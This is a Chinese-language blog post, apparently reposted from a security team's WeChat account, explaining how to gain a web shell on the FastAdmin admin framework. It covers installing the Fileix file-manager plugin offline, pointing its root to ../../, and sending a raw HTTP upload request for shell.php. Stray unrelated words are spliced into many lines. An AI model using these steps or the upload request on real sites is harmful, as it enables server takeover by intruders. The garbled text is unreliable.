0x01 前言javascript
FastAdmin是基於ThinkPHP5和Bootstrap的後臺框架,能夠利用三方插件GetShellphp
0x02 本地測試html
FastAdmin官方源碼下載地址:
java
https://www.fastadmin.net/download.html
開啓phpstudy本地搭建shell
安裝成功,新版源碼的後臺地址是隨機生成的
安全
後臺默認會有插件管理功能,可是絕大部分用戶會把這個功能閹割掉
微信
點進去看到有一堆付費和免費的插件
app
翻到了目前已有的三個官方發佈的在線文件管理器插件,一個是官方付費版,一個是三方付費版框架
可是因爲捨不得花十塊錢買插件,全部只能用三方免費版插件,直接點擊安裝會須要登陸帳號,登陸信息會記錄到日誌,不便於操做,因此去官方下載離線安裝包less
Fileix文件管理器離線安裝包官方下載地址:
https://www.fastadmin.net/store/fileix.html
點擊離線安裝,選擇上傳你下載的ZIP離線安裝包
插件安裝完成會自動啓用,默認路徑配置是這樣的
而後打開是這樣的
能夠修改成 ../../,那麼再打開就是這樣的
而後淺顯易懂,直接右鍵上傳php文件就能getshell
上面是本地測試環境,真實環境會出現這樣一個問題,就是點擊文件管理功能不會顯示任何內容
後來瞭解一下是由於沒有配置前臺頁面,不太好修改,因此利用下面的方法
0x03 通用方法
1.插件管理地址:
/admin/addon?ref=addtabs
進入後臺默認不顯示插件管理功能,訪問插件管理地址,上傳離線安裝包
2.文件管理地址/讀取全部文件地址:
/admin/fileix?ref=addtabs/admin/fileix/lst
真實環境中若是出現不顯示功能的狀況,必要時能夠讀取全部文件地址
3.上傳poc:
POST /admin/fileix/data?target=%2F HTTP/1.1Host: localhostContent-Length: 1050Origin: http://localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrZmyeAB3SciJDWSTAccept: */*Referer: http://localhostAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=xxxxxxxxConnection: close
------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="upload"; filename="shell.php"Content-Type: application/octet-stream
code------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="action"
upload------WebKitFormBoundaryrZmyeAB3SciJDWSTContent-Disposition: form-data; name="target"
/public/------WebKitFormBoundaryrZmyeAB3SciJDWST--
修改host地址post過去
利用poc成功上傳shell
本文分享自微信公衆號 - Khan安全團隊(KhanCJSH)。
若有侵權,請聯繫 support@oschina.cn 刪除。
本文參與「OSC源創計劃」,歡迎正在閱讀的你也加入,一塊兒分享。